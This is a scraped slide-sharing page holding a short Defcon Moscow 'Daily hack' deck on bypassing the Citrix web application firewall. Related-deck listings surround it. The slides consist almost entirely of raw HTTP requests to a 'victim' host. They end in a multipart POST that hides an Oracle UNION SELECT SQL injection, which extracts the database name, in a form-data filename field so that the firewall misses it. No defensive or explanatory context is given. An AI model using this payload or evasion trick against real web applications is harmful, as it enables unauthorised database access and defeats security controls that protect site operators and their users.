Abstract image of a woman sitting on books and studying on a laptop

2. [Daily hack] Citrix_waf_bypass

defconmoscow, profile picture
defconmoscow

The document discusses techniques for bypassing the Citrix Web Application Firewall (WAF). It includes three examples of HTTP requests targeting a vulnerable script: a GET request, a POST request, and an improved POST request that includes a multipart/form-data encoding and SQL injection payload to retrieve the database name. The document concludes with a link to additional information on Citrix WAF bypass techniques.

Internet
1 of 7
Download to read offline
1
2
3
4
5
6
7
Daily hack By DCM Jun 30, 2013
/whoami Defcon Moscow  You already know it about us  ???  PROFIT
Daily hack Citrix WAF Bypass GET /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive
Daily hack POST /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive Content-Length: 462 Citrix WAF Bypass
Daily hack POST /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive Content-Type: multipart/form-data; boundary=--------2125014176 Content-Length: 462 Citrix WAF Bypass
Daily hack Citrix WAF Bypass ----------2125014176 Content-Disposition: form-data; name="vid" /***/ ----------2125014176 Content-Disposition: form-data; name="vid"; filename="999999' union select 'aaaaa',SYS.DATABASE_NAME,'bbbb',NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU LL,NULL,NULL,NULL,NULL,NULL,null,NULL from dual -- " 1 ----------2125014176-- http://bit.ly/1448cRr
Daily hack The end.

More Related Content

TXT
Change log
Wagner Alves
 
ODP
A brief history of Linux Containers
Kirill Kolyshkin
 
PPTX
Brief history of Linux containers
OpenVZ
 
TXT
Test
dangthikimoanh
 
PPTX
Installation of windows 7 || how to boot pendrive or cd/dvd
gourav kottawar
 
PDF
Unicorn: The Ultimate CPU Emulator by Akshay Ajayan
Cysinfo Cyber Security Community
 
PDF
Containers from scratch
Rakuten Group, Inc.
 
PDF
using Virtualbox NAT and shared folder
Yingshiuan Pan
 
Change log
Wagner Alves
 
A brief history of Linux Containers
Kirill Kolyshkin
 
Brief history of Linux containers
OpenVZ
 
Test
dangthikimoanh
 
Installation of windows 7 || how to boot pendrive or cd/dvd
gourav kottawar
 
Unicorn: The Ultimate CPU Emulator by Akshay Ajayan
Cysinfo Cyber Security Community
 
Containers from scratch
Rakuten Group, Inc.
 
using Virtualbox NAT and shared folder
Yingshiuan Pan
 

What's hot (18)

PPTX
DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wireshark
meazza_15
 
PPTX
Building a Cyber Range - Kevin Cardwell
EC-Council
 
PPTX
Windows 7 installation ppt
Nagarajan Kamalakannan
 
ODP
How to access your FIWARE Lab Instance.
José Ignacio Carretero Guarde
 
PPTX
Windows XP Professional Installation
Nagarajan Kamalakannan
 
PDF
Require js + backbone, bower and grunt
Joe Fleming
 
PDF
containers-intro
Josef Karásek
 
TXT
Deposito
asroli AkanberubahinsyaAllah
 
PPTX
Exploits
Tylor Shellenberger
 
ODP
Design Summit - Smart State Analysis, aka VM Fleecing - Rich Oliveri
ManageIQ
 
PDF
EuroBSDCon 2021 - (auto)Installing BSD Systems
Vinícius Zavam
 
PDF
FreeBSD hosting
punkt.de GmbH
 
PPT
[HackInTheBox] Breaking virtualization by any means
Moabi.com
 
PDF
Hacking the Linux Kernel - An Introduction
Levente Kurusa
 
PPTX
Redis fundamental
Yuhao Zhang
 
PDF
CodePackager - Pack and Unpack repositories to mobile storage
Cheyin L
 
DOCX
Linux Tor Browser kurulum
reso95
 
PDF
Xavier NXのカーネルとVMの話
Yuki Mizuno
 
DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wireshark
meazza_15
 
Building a Cyber Range - Kevin Cardwell
EC-Council
 
Windows 7 installation ppt
Nagarajan Kamalakannan
 
How to access your FIWARE Lab Instance.
José Ignacio Carretero Guarde
 
Windows XP Professional Installation
Nagarajan Kamalakannan
 
Require js + backbone, bower and grunt
Joe Fleming
 
containers-intro
Josef Karásek
 
Deposito
asroli AkanberubahinsyaAllah
 
Exploits
Tylor Shellenberger
 
Design Summit - Smart State Analysis, aka VM Fleecing - Rich Oliveri
ManageIQ
 
EuroBSDCon 2021 - (auto)Installing BSD Systems
Vinícius Zavam
 
FreeBSD hosting
punkt.de GmbH
 
[HackInTheBox] Breaking virtualization by any means
Moabi.com
 
Hacking the Linux Kernel - An Introduction
Levente Kurusa
 
Redis fundamental
Yuhao Zhang
 
CodePackager - Pack and Unpack repositories to mobile storage
Cheyin L
 
Linux Tor Browser kurulum
reso95
 
Xavier NXのカーネルとVMの話
Yuki Mizuno
 

Viewers also liked (12)

PPTX
Hacking Citrix Cloud Server
Mr Cracker
 
PDF
Got citrix hack it
Sujith Rasnayake
 
PDF
In house penetration testing pci dss
Richard Thompson
 
PDF
[2014/10/06] HITCON Freetalk - App Security on Android
DEVCORE
 
PPTX
Android pen test basics
OWASPKerala
 
PDF
Android Security Development - Part 2: Malicious Android App Dynamic Analyzi...
Cheng-Yi Yu
 
PPTX
Home Arcade setup (NoVA Hackers)
Chris Gates
 
PPTX
[Wroclaw #1] Android Security Workshop
OWASP
 
PDF
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Chris Gates
 
PDF
Android Security & Penetration Testing
Subho Halder
 
PPTX
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
Denis Gundarev
 
PDF
Penetration Testing for Android Smartphones
IOSR Journals
 
Hacking Citrix Cloud Server
Mr Cracker
 
Got citrix hack it
Sujith Rasnayake
 
In house penetration testing pci dss
Richard Thompson
 
[2014/10/06] HITCON Freetalk - App Security on Android
DEVCORE
 
Android pen test basics
OWASPKerala
 
Android Security Development - Part 2: Malicious Android App Dynamic Analyzi...
Cheng-Yi Yu
 
Home Arcade setup (NoVA Hackers)
Chris Gates
 
[Wroclaw #1] Android Security Workshop
OWASP
 
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Chris Gates
 
Android Security & Penetration Testing
Subho Halder
 
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
Denis Gundarev
 
Penetration Testing for Android Smartphones
IOSR Journals
 

More from defconmoscow (20)

PDF
7.5. Pwnie express IRL
defconmoscow
 
PDF
7.4. Show impact [bug bounties]
defconmoscow
 
PDF
7.3. iCloud keychain-2
defconmoscow
 
PDF
7.2. Alternative sharepoint hacking
defconmoscow
 
PDF
7.1. SDLC try me to implenment
defconmoscow
 
PDF
6.4. PHD IV CTF final
defconmoscow
 
PDF
6.3. How to get out of an inprivacy jail
defconmoscow
 
PDF
6.2. Hacking most popular websites
defconmoscow
 
PDF
6.1. iCloud keychain and iOS 7 data protection
defconmoscow
 
PDF
6. [Bonus] DCM MI6
defconmoscow
 
PDF
5.3. Undercover communications
defconmoscow
 
PDF
5.2. Digital forensics
defconmoscow
 
PDF
5.1. Flashback [hacking AD]
defconmoscow
 
PDF
5. [Daily hack] Truecrypt
defconmoscow
 
PDF
4.5. Contests [extras]
defconmoscow
 
PDF
4.4. Hashcracking server on generic hardware
defconmoscow
 
PDF
4.3. Rat races conditions
defconmoscow
 
PDF
4.2. Web analyst fiddler
defconmoscow
 
PDF
4.1. Path traversal post_exploitation
defconmoscow
 
PDF
3.3. Database honeypot
defconmoscow
 
7.5. Pwnie express IRL
defconmoscow
 
7.4. Show impact [bug bounties]
defconmoscow
 
7.3. iCloud keychain-2
defconmoscow
 
7.2. Alternative sharepoint hacking
defconmoscow
 
7.1. SDLC try me to implenment
defconmoscow
 
6.4. PHD IV CTF final
defconmoscow
 
6.3. How to get out of an inprivacy jail
defconmoscow
 
6.2. Hacking most popular websites
defconmoscow
 
6.1. iCloud keychain and iOS 7 data protection
defconmoscow
 
6. [Bonus] DCM MI6
defconmoscow
 
5.3. Undercover communications
defconmoscow
 
5.2. Digital forensics
defconmoscow
 
5.1. Flashback [hacking AD]
defconmoscow
 
5. [Daily hack] Truecrypt
defconmoscow
 
4.5. Contests [extras]
defconmoscow
 
4.4. Hashcracking server on generic hardware
defconmoscow
 
4.3. Rat races conditions
defconmoscow
 
4.2. Web analyst fiddler
defconmoscow
 
4.1. Path traversal post_exploitation
defconmoscow
 
3.3. Database honeypot
defconmoscow
 

Recently uploaded (20)

PPTX
Tìm hiểu về dịch vụ FTTH - Fiber Optic Access Node
VoDuy27
 
PPTX
curriculumandpedagogyinearlychildhoodcurriculum-171021103104 - Copy.pptx
HeneszaAvenido1
 
PPTX
在线订购名古屋艺术大学毕业证, buy NUA diploma学历认证失败怎么办
学历认证定制霍尔姆斯学院毕业证学位证书编号怎么查【Q微:1954292140】
 
PDF
Alethe Consulting Corporate Profile and Solution Aproach
debashisrakshit2025
 
PPTX
Top Website Bugs That Hurt User Experience – And How Expert Web Design Fixes
e-Definers Technology
 
PDF
Session 1 (Week 1)fghjmgfdsfgthyjkhfdsadfghjkhgfdsa
ssuser25df8b
 
PDF
mera desh ae watn.(a source of motivation and patriotism to the youth of the ...
DtMalhonSharma
 
DOCX
Powerful Ways AIRCONNECT INFOSYSTEMS Pvt Ltd Enhances IT Infrastructure in In...
Airconnect pvtltd
 
PDF
Containerization lab dddddddddddddddmanual.pdf
muler161921
 
PDF
BIOCHEM CH2 OVERVIEW OF MICROBIOLOGY.pdf
tbasharababneh
 
PDF
SlidesGDGoCxRAIS about Google Dialogflow and NotebookLM.pdf
minhtrietgect
 
PPT
12 Things That Make People Trust a Website Instantly
Shethil Ahammed
 
PDF
Top 8 Trusted Sources to Buy Verified Cash App Accounts.pdf
How To Buy Verified Cash App Accounts
 
PDF
Alethe Consulting Corporate Profile and Solution Aproach
debashisrakshit2025
 
PDF
📍 LABUAN4D EXCLUSIVE SERVER STAR GAMING ASIA NO.1 TERPOPULER DI INDONESIA ! 🌟
alexiskandar061
 
PPT
250152213-Excitation-SystemWERRT (1).ppt
woldemariamworku2
 
PPT
415456121-Jiwratrwecdtwfdsfwgdwedvwe dbwsdjsadca-EVN.ppt
woldemariamworku2
 
PPTX
t_and_OpenAI_Combined_two_pressentations
wuvjwfnaadbnzelauy
 
PDF
simpleintnettestmetiaerl for the simple testint
sherlockholmes10009
 
PPTX
Viva Digitally Software-Defined Wide Area Network.pptx
HubraSEO
 
Tìm hiểu về dịch vụ FTTH - Fiber Optic Access Node
VoDuy27
 
curriculumandpedagogyinearlychildhoodcurriculum-171021103104 - Copy.pptx
HeneszaAvenido1
 
在线订购名古屋艺术大学毕业证, buy NUA diploma学历认证失败怎么办
学历认证定制霍尔姆斯学院毕业证学位证书编号怎么查【Q微:1954292140】
 
Alethe Consulting Corporate Profile and Solution Aproach
debashisrakshit2025
 
Top Website Bugs That Hurt User Experience – And How Expert Web Design Fixes
e-Definers Technology
 
Session 1 (Week 1)fghjmgfdsfgthyjkhfdsadfghjkhgfdsa
ssuser25df8b
 
mera desh ae watn.(a source of motivation and patriotism to the youth of the ...
DtMalhonSharma
 
Powerful Ways AIRCONNECT INFOSYSTEMS Pvt Ltd Enhances IT Infrastructure in In...
Airconnect pvtltd
 
Containerization lab dddddddddddddddmanual.pdf
muler161921
 
BIOCHEM CH2 OVERVIEW OF MICROBIOLOGY.pdf
tbasharababneh
 
SlidesGDGoCxRAIS about Google Dialogflow and NotebookLM.pdf
minhtrietgect
 
12 Things That Make People Trust a Website Instantly
Shethil Ahammed
 
Top 8 Trusted Sources to Buy Verified Cash App Accounts.pdf
How To Buy Verified Cash App Accounts
 
Alethe Consulting Corporate Profile and Solution Aproach
debashisrakshit2025
 
📍 LABUAN4D EXCLUSIVE SERVER STAR GAMING ASIA NO.1 TERPOPULER DI INDONESIA ! 🌟
alexiskandar061
 
250152213-Excitation-SystemWERRT (1).ppt
woldemariamworku2
 
415456121-Jiwratrwecdtwfdsfwgdwedvwe dbwsdjsadca-EVN.ppt
woldemariamworku2
 
t_and_OpenAI_Combined_two_pressentations
wuvjwfnaadbnzelauy
 
simpleintnettestmetiaerl for the simple testint
sherlockholmes10009
 
Viva Digitally Software-Defined Wide Area Network.pptx
HubraSEO
 

2. [Daily hack] Citrix_waf_bypass

  • 2. /whoami Defcon Moscow  You already know it about us  ???  PROFIT
  • 3. Daily hack Citrix WAF Bypass GET /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive
  • 4. Daily hack POST /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive Content-Length: 462 Citrix WAF Bypass
  • 5. Daily hack POST /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive Content-Type: multipart/form-data; boundary=--------2125014176 Content-Length: 462 Citrix WAF Bypass
  • 6. Daily hack Citrix WAF Bypass ----------2125014176 Content-Disposition: form-data; name="vid" /***/ ----------2125014176 Content-Disposition: form-data; name="vid"; filename="999999' union select 'aaaaa',SYS.DATABASE_NAME,'bbbb',NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU LL,NULL,NULL,NULL,NULL,NULL,null,NULL from dual -- " 1 ----------2125014176-- http://bit.ly/1448cRr